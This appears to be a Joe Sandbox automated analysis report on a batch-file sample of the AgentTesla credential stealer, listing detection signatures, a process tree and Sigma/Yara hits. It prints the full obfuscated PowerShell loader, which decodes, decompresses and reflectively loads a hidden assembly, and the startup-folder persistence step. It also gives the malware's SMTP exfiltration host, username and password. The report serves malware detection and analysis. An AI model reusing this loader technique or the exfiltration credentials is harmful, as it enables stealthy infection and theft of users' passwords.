Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ilZhNx3JAc.bat

Overview

General Information

Sample name:ilZhNx3JAc.bat
renamed because original name is a hash value
Original sample name:45a4bc99c532b7f256e58501fe36a809d3bcd530fe6543de7de77d0db7902c98.bat
Analysis ID:1545586
MD5:9884d4c89fcd9016a1af1f7ce48d4604
SHA1:8e7a81d398a10f3c1a4783932f85613570fee73f
SHA256:45a4bc99c532b7f256e58501fe36a809d3bcd530fe6543de7de77d0db7902c98
Tags:AgentTeslabatuser-NDA0E
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Found large BAT file
Injects a PE file into a foreign processes
Installs a global keyboard hook
Powershell is started from unusual location (likely to bypass HIPS)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6492 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ilZhNx3JAc.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 6376 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
    • cmd.exe (PID: 1448 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo F " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • xcopy.exe (PID: 6196 cmdline: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf MD5: 39FBFD3AF58238C6F9D4D408C9251FF5)
    • attrib.exe (PID: 5100 cmdline: attrib +s +h C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • ilZhNx3JAc.bat.Dmf (PID: 6764 cmdline: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • InstallUtil.exe (PID: 7176 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 7360 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7408 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\MustFlush.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7456 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 7472 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo F " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • xcopy.exe (PID: 7480 cmdline: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf MD5: 39FBFD3AF58238C6F9D4D408C9251FF5)
      • attrib.exe (PID: 7504 cmdline: attrib +s +h C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • MustFlush.bat.Dmf (PID: 7520 cmdline: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\AppData\Roaming\MustFlush.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • InstallUtil.exe (PID: 7684 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "nffplp.com", "Username": "airlet@nffplp.com", "Password": "$Nke%8XIIDtm"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.1517390065.0000000002711000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000012.00000002.3806878045.0000000002C9E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000010.00000002.1547502534.00000000065FE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 34 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x322ef:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x32361:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x323eb:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x3247d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x324e7:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x32559:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x325ef:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x3267f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                8.2.InstallUtil.exe.7a0000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  8.2.InstallUtil.exe.7a0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    Click to see the 20 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Base64 Encoded PowerShell Command Detected
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine|base64offset|contains: hv)^, Image: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, NewProcessName: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, OriginalFileName: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ilZhNx3JAc.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6492, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", ProcessId: 6764, ProcessName: ilZhNx3JAc.bat.Dmf
                    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine|base64offset|contains: hv)^, Image: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, NewProcessName: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, OriginalFileName: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ilZhNx3JAc.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6492, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", ProcessId: 6764, ProcessName: ilZhNx3JAc.bat.Dmf
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs" , ProcessId: 7360, ProcessName: wscript.exe
                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine|base64offset|contains: hv)^, Image: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, NewProcessName: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, OriginalFileName: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ilZhNx3JAc.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6492, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", ProcessId: 6764, ProcessName: ilZhNx3JAc.bat.Dmf
                    Sigma detected: Gzip Archive Decode Via PowerShell
                    Source: Process startedAuthor: Hieu Tran: Data: Command: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", CommandLine|base64offset|contains: hv)^, Image: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, NewProcessName: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, OriginalFileName: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ilZhNx3JAc.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6492, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null", ProcessId: 6764, ProcessName: ilZhNx3JAc.bat.Dmf
                    Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, ProcessId: 6764, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ar35we2c.lka.ps1
                    Sigma detected: Suspicious Copy From or To System Directory
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, CommandLine: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\xcopy.exe, NewProcessName: C:\Windows\System32\xcopy.exe, OriginalFileName: C:\Windows\System32\xcopy.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ilZhNx3JAc.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6492, ParentProcessName: cmd.exe, ProcessCommandLine: xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, ProcessId: 6196, ProcessName: xcopy.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 163.44.198.71, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 7176, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49740
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs" , ProcessId: 7360, ProcessName: wscript.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf, ProcessId: 6764, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs

                    Suricata Signatures

                    No Suricata rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
